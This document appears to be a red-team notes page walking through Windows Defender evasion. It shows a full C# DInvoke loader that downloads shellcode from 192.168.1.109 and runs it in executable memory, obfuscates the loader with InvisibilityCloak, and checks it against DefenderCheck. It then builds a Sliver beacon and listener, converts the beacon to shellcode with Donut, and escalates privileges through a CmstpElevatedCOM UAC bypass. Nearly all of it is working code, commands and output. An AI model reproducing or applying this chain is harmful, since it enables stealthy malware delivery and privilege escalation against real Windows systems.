Bypass AV/EDR via DInvoke + Sliver

Windows Defender 2025

Creating Loader

Repository: https://github.com/Kara-4search/DInvoke_shellcodeload_CSharp

using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Net;

namespace DInvoke_Code
{
    class Program
    {
        static void Main(string[] args)
        {

            //Dinvoke test
            byte[] codepent = new WebClient().DownloadData("http://192.168.1.109:8080/rev.bin");

            // Console.WriteLine((uint)codepent.Length);
            // System.Threading.Thread.Sleep(10000);
            IntPtr func_ptr = IntPtr.Zero;
            // IntPtr pHandle = Process.GetCurrentProcess().Handle;
            
            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "VirtualAlloc");
            DELEGATES.VirtualAllocRx VirtualAllocRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.VirtualAllocRx)) as DELEGATES.VirtualAllocRx;
            IntPtr rMemAddress = VirtualAllocRx(0, (uint)codepent.Length, 0x1000 | 0x2000, 0x40);

            Marshal.Copy(codepent, 0, (IntPtr)(rMemAddress), codepent.Length);
            IntPtr hThread = IntPtr.Zero;
            IntPtr pinfo = IntPtr.Zero;
            UInt32 threadId = 0;

            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "CreateThread");
            DELEGATES.CreateThreadRx CreateThreadRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.CreateThreadRx)) as DELEGATES.CreateThreadRx;
            hThread = CreateThreadRx(0, 0, rMemAddress, pinfo, 0, ref threadId);

            func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "WaitForSingleObject");
            DELEGATES.WaitForSingleObjectRx WaitForSingleObjectRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.WaitForSingleObjectRx)) as DELEGATES.WaitForSingleObjectRx;
            WaitForSingleObjectRx(hThread, 0xFFFFFFFF);
        }
    }
}

Obfuscation the project

Obfuscation project:

GitHub - h4wkst3r/InvisibilityCloak: Proof-of-concept obfuscation toolkit for C# post-exploitation toolsGitHub

Modify the lines 147,148 as follows:

openAssemblyInfoFile = open(assemblyInfoFile, 'r',encoding='utf-8')
openCopyAssemblyInfoFile = open(f"{assemblyInfoFile}_copy", "w",encoding='utf-8')

PS C:\Users\maldev\Desktop\CompiledTools\InvisibilityCloak > python.exe .\InvisibilityCloak.py -d ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload -n "Zero" -m reverse

        ,                 .     .   .        ,-. .         ,
        |         o     o |   o | o |       /    |         |
        | ;-. . , . ,-. . |-. . | . |-  . . |    | ,-. ,-: | ,
        | | | |/  | `-. | | | | | | |   | | \    | | | | | |<
        ' ' ' '   ' `-' ' `-' ' ' ' `-' `-|  `-' ' `-' `-` ' `
                                        `-'

====================================================
[*] INFO: String obfuscation method: reverse
[*] INFO: Directory of C# project: ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload
[*] INFO: New tool name: Zero
====================================================

[*] INFO: Generating new GUID for C# project
[*] INFO: New project GUID is f9d3c7e4-82de-4a66-9eba-8b0b3c149768
[*] INFO: Changing C# project GUID in below files:
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_shellcodeload.sln
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DInvoke_shellcodeload.csproj
..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\Properties\AssemblyInfo.cs


[*] INFO: Removing PDB string in C# project file

[*] INFO: Renaming DInvoke_shellcodeload.sln to Zero.sln
[*] INFO: Renaming DInvoke_shellcodeload.csproj to Zero.csproj
[*] INFO: Renaming directory DInvoke_shellcodeload to Zero

[+] SUCCESS: New GUID of f9d3c7e4-82de-4a66-9eba-8b0b3c149768 was generated and replaced in your project
[+] SUCCESS: New tool name of Zero was replaced in project

[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvokeFunctions.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DELEGATES.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DInvokeFunctions.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\Program.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\obj\x64\Debug\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs
[*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs

[+] SUCCESS: Your new tool Zero now has the invisibility cloak applied.

FLARE-VM 04/30/2025 16:31:00
PS C:\Users\maldev\Desktop\CompiledTools\InvisibilityCloak >

In visual studio change the properties of Output Type to Windows Application

Finally, Replace every instance of DInvoke into the project and compile it as Realese with x64 architecture.

PS C:\Users\maldev\Desktop\CompiledTools\DefenderCheck\DefenderCheck\DefenderCheck\bin\Release > .\DefenderCheck.exe C:\Users\maldev\Desktop\CompiledTools\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\bin\x64\Release\DInvoke_test.exe
[+] No threat found in submitted file!

Create beacon with sliver

sliver > generate beacon --http 192.168.1.109:1234 --os windows

[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 43s
[*] Implant saved to /home/Intrusionz3r0/Documents/Sliver/KOREAN_JUNKER.exe

sliver > http --lhost 192.168.1.109 --lport 1234 

[*] Starting HTTP :1234 listener ...
[*] Successfully started job #2

sliver >

Install Donut

#Download and compile donut
Intrusionz3r0@htb[/htb]$ git clone https://github.com/TheWover/donut
Intrusionz3r0@htb[/htb]$ cd donut/
Intrusionz3r0@htb[/htb]$ make -f Makefile
Intrusionz3r0@htb[/htb]$ ./donut ./

Using donut specify -e 3 for encryption and -b 1 to not add Amsi bypass because the used Amsi bypass gets detected.

❯ ./donut -i KOREAN_JUNKER.exe -b 1 -e 3 -o rev.bin

  [ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
  [ Copyright (c) 2019-2021 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "KOREAN_JUNKER.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP/ETW : none
  [ PE Headers    : overwrite
  [ Shellcode     : "rev.bin"
  [ Exit          : Thread

Payload Downloaded and executed successfully

Install UAC-BOF-Bonanza toolkit into Sliver

❯ git clone https://github.com/icyguider/UAC-BOF-Bonanza.git
❯ cd UAC-BOF-Bonanza
❯ cp -rp ~/Documents/Tools/UAC-BOF-Bonanza/CmstpElevatedCOM/ ~/.sliver-client/extensions
❯ cd ~/.sliver-client/extensions/CmstpElevatedCOM
❯ make
sliver (KOREAN_JUNKER) > extensions load /home/Intrusionz3r0/.sliver-client/extensions/CmstpElevatedCOM
sliver (KOREAN_JUNKER) > armory install coff-loader

Elevate token as high integrity Shell

sliver (KOREAN_JUNKER) > CmstpElevatedCOM "C:\Users\maldev\Downloads\http-local-1234.exe"
[*] Successfully executed CmstpElevatedCOM (coff-loader)
[*] Got output:
Successfully spoofed PEB for explorer.exe
Successfully created elevated CMLuaUtil COM object
Calling ShellExec method from the elevated CMLuaUtil COM object...
ShellExec executed successfully!

ddd

Last updated 7 months ago